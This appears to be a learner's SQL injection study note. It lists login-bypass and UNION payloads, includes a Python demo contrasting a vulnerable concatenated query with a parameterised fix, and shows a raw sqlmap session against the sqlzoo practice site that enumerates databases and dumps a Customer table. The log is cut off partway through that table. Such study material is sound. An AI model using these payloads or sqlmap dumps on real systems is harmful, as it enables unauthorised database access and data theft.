SQL Injection (SQLi)

SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites.

We did the interactive tutorial

http://sqlzoo.net/hack/index.html

and I spent the rest of the day learning the tool sqlmap and how blind SQL injections work.

The precise injection depends on the DB implementation; however, common techniques are:

- admin' --
- admin' #
- admin'/*
- ' or 1=1--
- ' or 1=1#
- ' or 1=1/*
- ') or '1'='1--
- ') or ('1'='1--
- ...

Login as a different user:

- ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

This is a nice cheat sheet I used:
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
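To show why the payloads above work and what stops them, here is an added example (not from the original page or from sqlzoo): a login query built by string concatenation next to the same query with bound parameters, run against a constructed in-memory SQLite users table with the four columns the UNION payload expects. The table contents, the function names and the SQLite back end are assumptions for the demo.

```python
import sqlite3

# Constructed sample users (not from the original page): id, name, password, is_admin.
SAMPLE_USERS = [(1, "admin", "s3cret", 1), (2, "alice", "wonderland", 0)]

# Payloads from the list above, sent in the name field together with a wrong password.
PAYLOADS = [
    "admin' --",
    "' or 1=1--",
    "' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--",
]


def make_db():
    """In-memory SQLite table with the four columns the UNION payload above expects."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, name, password):
    """Vulnerable: input is pasted into the SQL text, so a quote, -- or UNION in it
    is parsed as SQL. Returns the name of the row the query matched, or None."""
    sql = ("SELECT id, name, password, is_admin FROM users "
           f"WHERE name = '{name}' AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[1] if row else None


def login_safe(conn, name, password):
    """Fixed: the same query with bound parameters. The driver passes the input as
    data, so a quote or comment marker can never change the statement's shape."""
    sql = ("SELECT id, name, password, is_admin FROM users "
           "WHERE name = ? AND password = ?")
    row = conn.execute(sql, (name, password)).fetchone()
    return row[1] if row else None


def run_demo():
    """Map each payload to (who the vulnerable login lets in, who the safe login lets in)."""
    conn = make_db()
    return {p: (login_vulnerable(conn, p, "wrong"), login_safe(conn, p, "wrong"))
            for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in run_demo().items():
        print(f"{payload!r:58} vulnerable -> {vuln!r:14} safe -> {safe!r}")
```

SQLite only recognises the `--` comment style, so the `#` variants in the list are MySQL-specific; on MySQL, `--` must also be followed by a space to start a comment.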

michael@michael-ThinkPad ~
  % sqlmap -u http://sqlzoo.net/hack/passwd.pl\?name\=kek\&password\=keke -a
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.5#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:21:03

[15:21:03] [INFO] resuming back-end DBMS 'mysql'
[15:21:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: name=' UNION ALL SELECT CONCAT(CONCAT('qkxqq','pUyojvlzZaeyrLAAEVzlrLEiwrYpdNchFgrjKOaW'),'qkkjq')-- fuyT&password=
---
[15:21:03] [INFO] the back-end DBMS is MySQL
[15:21:03] [INFO] fetching banner
web server operating system: Linux Fedora
web application technology: Apache 2.4.33
back-end DBMS: MySQL 5 (MariaDB fork)
banner:    '10.2.14-MariaDB'
[15:21:04] [INFO] fetching current user
current user:    'hack@localhost'
[15:21:04] [INFO] fetching current database
current database:    'hack'
[15:21:04] [INFO] fetching server hostname
hostname:    'warp'
[15:21:04] [INFO] testing if current user is DBA
[15:21:04] [INFO] fetching current user
[15:21:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[15:21:04] [INFO] fetching database users
[15:21:04] [INFO] used SQL query returns 1 entries
database management system users [1]:
[*] 'hack'@'localhost'

[15:21:05] [INFO] fetching database users password hashes
[15:21:05] [WARNING] the SQL query provided does not return any output
[15:21:05] [ERROR] unable to retrieve the password hashes for the database users (probably because the DBMS current user has no read privileges over the relevant system database table(s))
[15:21:05] [INFO] fetching database users privileges
[15:21:05] [INFO] used SQL query returns 1 entries
database management system users privileges:
[*] 'hack'@'localhost' [1]:
    privilege: USAGE

[15:21:05] [WARNING] on MySQL the concept of roles does not exist. sqlmap will enumerate privileges instead
[15:21:05] [INFO] fetching database users privileges
database management system users roles:
[*] 'hack'@'localhost' [1]:
    role: USAGE

[15:21:05] [INFO] sqlmap will dump entries of all tables from all databases now
[15:21:05] [INFO] fetching database names
[15:21:05] [INFO] used SQL query returns 4 entries
[15:21:05] [INFO] resumed: hack
[15:21:05] [INFO] resumed: information_schema
[15:21:05] [INFO] resumed: movie
[15:21:05] [INFO] resumed: test
[15:21:05] [INFO] fetching tables for databases: 'hack, information_schema, movie, test'
[15:21:05] [INFO] used SQL query returns 102 entries
[15:21:05] [INFO] fetching columns for table 'Customer' in database 'test'
[15:21:05] [INFO] used SQL query returns 8 entries
[15:21:05] [INFO] resumed: "Company_ref","int(11)"
[15:21:05] [INFO] resumed: "Company_name","varchar(50)"
[15:21:05] [INFO] resumed: "Contact_id","int(11)"
[15:21:05] [INFO] resumed: "Address_1","varchar(50)"
[15:21:05] [INFO] resumed: "Address_2","varchar(50)"
[15:21:05] [INFO] resumed: "Town","varchar(50)"
[15:21:05] [INFO] resumed: "Postcode","varchar(50)"
[15:21:05] [INFO] resumed: "Telephone","varchar(50)"
[15:21:05] [INFO] fetching entries for table 'Customer' in database 'test'
[15:21:05] [INFO] used SQL query returns 50 entries
Database: test
Table: Customer
[50 entries]
+------------+---------------------+----------+-------------+-----------+--------------------------+-------------+-----------------------+
| Contact_id | Town                | Postcode | Telephone   | Address_2 | Address_1                | Company_ref | Company_name          |
+------------+---------------------+----------+-------------+-----------+--------------------------+-------------+-----------------------+
| 112        | Dartford            | DA48 5WU | 01001722832 | NULL      | 53 Finger Gate           | 100         | Haunt Services        |
| 33         | Guildford           | GY34 4ZH | 01004256920 | NULL      | 34 Pyorrhea Green        | 101         | Genus Ltd.            |
| 111        | Harrow              | HA32 6PP | 01012384042 | NULL      | 67 Napery Green          | 102         | Corps Ltd.            |